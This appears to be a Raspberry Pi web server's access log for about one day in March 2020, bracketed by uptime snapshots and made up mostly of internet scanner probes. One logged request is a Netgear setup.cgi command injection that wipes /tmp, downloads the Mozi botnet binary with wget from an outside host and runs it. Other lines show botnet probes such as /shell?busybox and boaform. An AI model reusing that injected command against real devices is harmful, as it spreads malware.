Sat Mar 28 06:25:07 MDT 2020 06:25:07 up 32 days, 10:53, 1 user, load average: 0.54, 0.30, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 32days 26:34 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE 178.205.86.70 - - [28/Mar/2020:14:22:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 23.92.36.3 - - [28/Mar/2020:14:31:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 23.92.36.3 - - [28/Mar/2020:14:31:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Java/1.8.0_242" 192.241.238.241 - - [28/Mar/2020:14:43:01 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 176.104.243.33 - - [28/Mar/2020:15:09:05 +0000] "GET / HTTP/1.1" 400 0 "" "" 171.67.70.85 - - [28/Mar/2020:15:51:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 178.156.64.20 - - [28/Mar/2020:16:15:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 159.203.3.206 - - [28/Mar/2020:16:46:16 +0000] "GET /index.php HTTP/1.1" 404 0 "" "" 139.162.106.181 - - [28/Mar/2020:16:48:01 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 192.241.237.8 - - [28/Mar/2020:16:56:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 212.200.106.94 - - [28/Mar/2020:21:09:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 172.104.242.173 - - [28/Mar/2020:21:23:06 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 171.67.70.85 - - [28/Mar/2020:21:57:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 93.146.66.148 - - [28/Mar/2020:22:53:51 +0000] "GET /Pages/login.htm HTTP/1.1" 400 0 "" "Hi" 47.111.19.40 - - [28/Mar/2020:23:25:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.153.199.118 - - [28/Mar/2020:23:28:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 219.77.67.58 - - [28/Mar/2020:23:31:24 +0000] "GET /shell?busybox HTTP/1.1" 400 0 "" "Mozilla/5.0" 219.77.67.58 - - [28/Mar/2020:23:31:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.130.131 - - [28/Mar/2020:23:35:00 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 202.86.142.218 - - [28/Mar/2020:23:55:54 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 12.111.128.210 - - [28/Mar/2020:23:59:12 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 12.111.128.210 - - [28/Mar/2020:23:59:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 187.0.165.212 - - [29/Mar/2020:00:23:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 220.112.194.123 - - [29/Mar/2020:00:32:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 190.186.236.4 - - [29/Mar/2020:00:37:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 79.106.44.58 - - [29/Mar/2020:03:24:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 171.67.70.85 - - [29/Mar/2020:03:50:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 94.140.114.53 - - [29/Mar/2020:05:16:31 +0000] "GET / HTTP/1.0" 200 25000 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" 45.56.78.64 - - [29/Mar/2020:05:20:33 +0000] "GET /Report.docx HTTP/1.1" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)" 178.116.134.216 - - [29/Mar/2020:05:51:47 +0000] "GET / HTTP/1.1" 400 0 "" "" 95.47.56.31 - - [29/Mar/2020:06:25:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 172.105.89.161 - - [29/Mar/2020:07:22:17 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 61.219.11.153 - - [29/Mar/2020:08:13:52 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 185.62.22.58 - - [29/Mar/2020:09:24:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 120.71.215.176 - - [29/Mar/2020:09:52:13 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://120.71.215.176:38705/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 171.67.70.85 - - [29/Mar/2020:09:59:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 36.74.84.240 - - [29/Mar/2020:10:05:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 85.204.217.191 - - [29/Mar/2020:11:24:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 103.203.210.129 - - [29/Mar/2020:12:16:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" Sun Mar 29 06:25:11 MDT 2020 06:25:11 up 33 days, 10:53, 1 user, load average: 0.55, 0.28, 0.21 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 33days 27:09 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE